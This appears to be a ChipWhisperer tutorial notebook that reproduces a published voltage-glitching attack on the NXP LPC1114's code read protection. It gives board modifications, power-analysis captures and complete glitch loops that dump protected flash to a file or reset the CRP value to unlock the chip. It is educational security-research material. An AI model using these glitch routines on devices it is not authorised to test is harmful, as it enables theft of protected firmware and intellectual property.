## Background on Code Read Protection

To help protect proprietary code from being dumped via a bootloader or a debugging interface, many microcontrollers include some mechanism that locks down the flash and prevents reads. In the case of NXP's LPC1114, this is done by reading a value from flash during the boot sequence, with different values corresponding to different levels of protection. As is shown in the figure below, there are 4 levels of read protection, with the rest of the values representing an unlocked device. This makes this a great target for glitching, as corrupting one bit from this read will unlock the device and give us full access. Since higher CRP levels are harder (or in the case of CRP level 3, "impossible") to remove, we'll be using the device in CRP level 1.

| Name    | Value in FLASH  | JTAG/SWD | Serial Bootloader (ISP) | Notes                                                                                |
|---------|-----------------|----------|-------------------------|--------------------------------------------------------------------------------------|
| NO_ISP  | 0x4E697370      | enabled  | disabled                |                                                                                      |
| CRP1    | 0x12345678      | disabled | subset                  | Read memory disabled. Sector erase and mass erase possible (which also removes CRP). |
| CRP2    | 0x87654321      | disabled | subset                  | Read memory disabled. Mass erase only (which also removes CRP).                      |
| CRP3    | 0x43218765      | disabled | disabled                | Claimed impossible to recover from since no reprogramming interface.                 |
| INVALID | Any other Value | enabled  | enabled                 |                                                                                      |

This was first published by Chris Gerlinsky at RECON Brussels. You can [see his slides here](https://recon.cx/2017/brussels/resources/slides/RECON-BRX-2017-Breaking_CRP_on_NXP_LPC_Microcontrollers_slides.pdf) or watch his [presentation here](https://www.youtube.com/watch?v=98eqp4WmHoQ). It was [re-created by Dmitry Nedospasov on his blog](https://toothless.co/blog/bootloader-bypass-part1/), which has additional details and examples of how you can achieve this attack.

We'll be recreating the attack with the ChipWhisperer, to show the value of this modular platform in quickly testing new attacks.


## Hardware Setup

This tutorial requires some hardware setup. We will use a "LPC-P1114" development board, available from Mouser or Digikey.

### ChipWhisperer-Lite (CW1173) with LPC-P1114 Development Board

To allow the ChipWhisperer-Lite to interface with this board, we'll need to make some small modifications to the board:

1. Short jumper BLD_E to put the device in bootloader mode.
2. Solder a wire from GND to P0_3 (Second column from the left, fourth row from the bottom) to put the bootloader in UART mode.
3. Remove C1 and C4 from the board.
4. Cut the traces on 3.3V_CORE and 3.3V_IO_E.
5. Add a 12-ohm resistor on the 3.3V_CORE jumper.
6. Add an SMA connector to the board and connect Vcc to the center pin and GND to one of the outside pins (or just use a jumper instead of fancy SMA).
7. Add a header pin/wire to RST (First column from the left, third row from the bottom). The CW-Lite needs two connection points, as we'll be both resetting this pin and triggering off of it.

The following shows the required modifications:

![Image show LPC-P1114 Modifications](img/A9_LPC1114_CHANGES.jpg)

Next, we'll need to connect the CW-Lite to the connect pins on the dev board to pins on CW-Lite's 20 pin header:

1. Connect pin 1 of UEXT (Vcc) to pin 3 on the CW-Lite
2. Connect pin 2 of UEXT (GND) to pin 2 on the CW-Lite
3. Connect pin 3 of UEXT (TXD) to pin 10 on the CW-Lite
4. Connect pin 4 of UEXT (RXD) to pin 12 on the CW-Lite
5. Connect RST (the 3 header pins soldered on) to pins 5 (nRST) and 16 (GPIO4) on the CW-Lite
7. Finally, attach an SMA cable between the one you added to the board and the GLITCH connector on the CW-Lite. If you'd like instead you can also use a SMA Tee to do both measurement & glitch.

![Image show LPC-P1114 Connections](img/A9_LPC_CWLITE_Conn.jpg)


## Exploration and Attack

In [ ]:
import sys
import binascii

import time
import logging
import os
from collections import namedtuple
import numpy as np
import chipwhisperer as cw
from tqdm.notebook import trange

scope = cw.scope()
target = cw.target(scope)

In [ ]:
# Original attack done with 100 MHz clock - can be helpful to run this
# 2x faster to get better resolution, which seems useful for glitching certain boards.
# But if you want to use DPA you need to leave this set to '1'
freq_multiplier = 1

#Initial Setup
scope.adc.samples = 10000
scope.adc.offset = 0
scope.clock.adc_src = "clkgen_x1"
scope.trigger.triggers = "tio4"
scope.io.glitch_lp = True
scope.io.hs2 = None

In [ ]:
if scope._is_husky:
    scope.glitch.enabled = True

# this value is for CW-Lite/Pro; for CW-Husky, refer to Fault 1_1
scope.glitch.width = 40

scope.io.tio1 = "serial_rx"
scope.io.tio2 = "serial_tx"
scope.adc.basic_mode = "rising_edge"
scope.clock.clkgen_freq = 100000000 * freq_multiplier
scope.glitch.clk_src = "clkgen"
scope.glitch.trigger_src = "ext_single"
scope.glitch.output = "enable_only"

target.baud = 38400
target.key_cmd = ""
target.go_cmd = ""
target.output_cmd = ""

We need to talk to this device. Rather than implement our own protocol interface, we are going to be lazy. Luckily, an existing 'nxprog' module implements almost all the required commands. We can just connect ChipWhisperer's serial port to this module and get going: 

In [ ]:
import external.nxpprog as nxpprog
import time

class CWDevice(nxpprog.NXPSerialDevice):
    def __init__(self, scope, target, print_debug=False):
        '''Add connection to ChipWhisperer'''
        self.scope = scope
        self.target = target
        self.debug = print_debug
        
    def isp_mode(self):
        '''Enter ISP Mode by reseting + pulling pin'''
        self.scope.io.nrst = 'low'
        time.sleep(0.01)
        self.scope.io.nrst = 'high'
        self.target.ser.flush()

    def write(self, data):
        '''Write data to serial port'''
        if self.debug:
            print("Write: " + str(data))
        self.target.ser.write(data)
        time.sleep(0.05) #work-around for CW serial port buffer on TX problem

    def readline(self, timeout=None):
        '''Read line from serial port, trying for timeout seconds'''
        if timeout is None:
            timeout = 5000
        else:
            timeout = int(timeout * 1000)

        line = ''
        while True:
            c = self.target.ser.read(1, timeout)
            if not c:
                break
            if c[0] == '\r':
                if not line:
                    continue
                else:
                    break
            if c[0] == '\n':
                if not line:
                    continue
                else:
                    break
            line += c
        
        if self.debug:
            print("Read: " + str(line))
        return line

Let's get an idea what this looks like. We can for example connect to the device and check the serial number:

In [ ]:
import time
nxpdev = CWDevice(scope, target, print_debug=True)

scope.io.target_pwr = False
time.sleep(0.1)
scope.io.target_pwr = True
time.sleep(0.1)

#Need to enter ISP mode before initializing programmer object
nxpdev.isp_mode()
nxpp = nxpprog.NXP_Programmer("lpc1114", nxpdev, 12000)

#Examples of stuff you can do:
print(nxpp.get_serial_number())
print(nxpp.read_block(0, 4))

## DPA on Fuse Bytes

Assuming this all works, we have a few paths forward. If you don't have a locked device, you can perform a basic FF vs 00 DPA type attack! To do this, ensure you are connected to the *measure* input on your LPC1114 board. We'll then set the bytes to 0xFFFFFFF and 0x000000, to see where the bytes might be loaded.

The first thing to do is to build a simple capture function:

In [ ]:
%matplotlib notebook
import matplotlib.pylab as plt



scope.gain.gain = 30
scope.gain.mode = "high"

def set_crp(nxpp, value, image=None):
    """
    Set CRP value - requires the first 4096 bytes of FLASH due to
    page size!
    """
    
    if image is None:
        f = open(r"external/lpc1114_first4096.bin", "rb")
        image = f.read()
        f.close()
    
    image = list(image)
    image[0x2fc] = (value >> 0)  & 0xff
    image[0x2fd] = (value >> 8)  & 0xff
    image[0x2fe] = (value >> 16) & 0xff
    image[0x2ff] = (value >> 24) & 0xff

    print("Programming flash...")
    nxpp.prog_image(bytes(image), 0)
    print("Done!")


def capture_crp(nxpdev, value, num_tries=1000, bypass_oserror=True):
    """
    Capture an average power trace for a given CRP level.
    """
    ref_list = []
    nxpdev.isp_mode()
    nxpp = nxpprog.NXP_Programmer("lpc1114", nxpdev, 12000)    
    try:
        set_crp(nxpp, value)
    except IOError as e:
        print("IOError - assumed CRP enabled. Error: " + str(e))
    scope.io.target_pwr = False
    time.sleep(0.2)
    scope.io.target_pwr = True
    time.sleep(0.2)

    print("Performing DPA capture for %04x"%value)
    for i in range(0, num_tries):
        scope.io.nrst = 'low'
        scope.arm()
        scope.io.nrst = 'high'

        scope.capture()

        ref_list.append(scope.get_last_trace())
        
    return np.mean(ref_list, axis=0) 

In [ ]:
%matplotlib notebook
import matplotlib.pylab as plt
import numpy as np

nxpdev = CWDevice(scope, target)

trace_1s = capture_crp(nxpdev, 0xffffffff)
trace_0s = capture_crp(nxpdev, 0)

plt.plot(trace_1s - trace_0s)

In [ ]:
%matplotlib notebook
import matplotlib.pylab as plt
import numpy as np

nxpdev = CWDevice(scope, target)

trace_unlocked = capture_crp(nxpdev, 0x02345688) #Wrong value - unlocked

In [ ]:
trace_locked = capture_crp(nxpdev, 0x12345678) #Same hamming weight - but locked
plt.plot(trace_unlocked - trace_locked)

## Glitching Fuse Bytes

First, check that your device is locked. The following should result in an exception when you attemp to run read_block(), which is disallowed now:

In [ ]:
nxpdev = CWDevice(scope, target, print_debug=True)

#Need to enter ISP mode before initializing programmer object
nxpdev.isp_mode()
nxpp = nxpprog.NXP_Programmer("lpc1114", nxpdev, 12000)

#Examples of stuff you can do:
print(nxpp.get_serial_number())
print(nxpp.read_block(0, 4))

Yikes! Let's move the cable to the **glitch** output on the ChipWhisperer, so we can do VCC glitching on the target. Now we'll scan a range that seems interesting - the following offset_range works in practice. You'll notice it doesn't exactly match up with the DPA results, which is something that requires more thought (we're not exactly sure on what the device is doing):

In [ ]:

Range = namedtuple("Range", ["min", "max", "step"])
offset_range = Range(5180*freq_multiplier, 5185*freq_multiplier, 1)
repeat_range = Range(7*freq_multiplier, 40*freq_multiplier, 1)

scope.glitch.repeat = repeat_range.min

In [ ]:
import time
from binascii import unhexlify

print("Attempting to glitch LPC Target")

scope.io.target_pwr = False
time.sleep(0.2)
scope.io.target_pwr = True
time.sleep(0.2)


nxpdev = CWDevice(scope, target)

done = False
while done == False:
    scope.glitch.ext_offset = offset_range.min
    if scope.glitch.repeat >= repeat_range.max:
        scope.glitch.repeat = repeat_range.min
    while scope.glitch.ext_offset < offset_range.max:

        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.arm()
        scope.io.nrst = 'high'
        target.ser.flush()
        
        print("Glitch offset %4d, width %d........"%(scope.glitch.ext_offset, scope.glitch.repeat), end="")

        #scope.capture()
        #plot.send(scope.get_last_trace())
        
        time.sleep(0.05)
        try:
            nxpp = nxpprog.NXP_Programmer("lpc1114", nxpdev, 12000)

            try:
                data = nxpp.read_block(0, 4)
                print("[SUCCESS]\n")
                print("  Glitch OK! Beginning dump...")
                
                datafile = None
                
                for i in range(0, 0x7FFF, 16):
                    data = nxpp.read_block(i, 16)
                    st = " ".join(["%02X"%ord(b) for b in data])
                    print(st)
                    
                    if datafile is None:
                        datafile = data
                    else:
                        datafile += data
                    
                
                with open("lpc1114_dump.bin", "wb") as f:
                    f.write(unhexlify(datafile))
                with open("lpc1114_dump_ascii.bin", "wb") as f:
                    f.write(datafile.encode('latin-1'))    
                
                
                done = True
                break

            except IOError:
                print("[NORMAL]")
    
        except IOError:
            print("[FAILED]")
            pass
    
        scope.glitch.ext_offset += offset_range.step

    scope.glitch.repeat += repeat_range.step

What if you just want to "unlock" the device? In which case you can modify the code to dump the first 4K (we need 4K since the bootloader erases 4K at a time). With the device unlocked, we can do an erase-program cycle with a modified CRP:

In [ ]:
import time

print("Attempting to glitch LPC Target")

scope.io.target_pwr = False
time.sleep(0.2)
scope.io.target_pwr = True
time.sleep(0.2)

nxpdev = CWDevice(scope, target)

done = False
while done == False:
    scope.glitch.ext_offset = offset_range.min
    if scope.glitch.repeat >= repeat_range.max:
        scope.glitch.repeat = repeat_range.min
    while scope.glitch.ext_offset < offset_range.max:

        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.arm()
        scope.io.nrst = 'high'
        target.ser.flush()
        
        print("Glitch offset %4d, width %d........"%(scope.glitch.ext_offset, scope.glitch.repeat), end="")

        time.sleep(0.05)
        try:
            nxpp = nxpprog.NXP_Programmer("lpc1114", nxpdev, 12000)

            try:
                data = nxpp.read_block(0, 4)            
                print("[SUCCESS]\n")
                print("  Glitch OK! Reading first 4K...")
                block = None
                #Deal with crappy ChipWhisperer serial buffer by splitting read up
                for i in range(0, 4096, 32):
                    if block is None:
                        block = nxpp.read_block(i, 32)
                    else:
                        block += nxpp.read_block(i, 32)
                
                print("  Adjusting CRP...")
                block = [ord(t) for t in block]
                set_crp(nxpp, 0, block)
                done = True
                break

            except IOError:
                print("[NORMAL]")
    
        except IOError:
            print("[FAILED]")
            pass
    
        scope.glitch.ext_offset += offset_range.step

    scope.glitch.repeat += repeat_range.step

In [ ]:
scope.dis()
target.dis()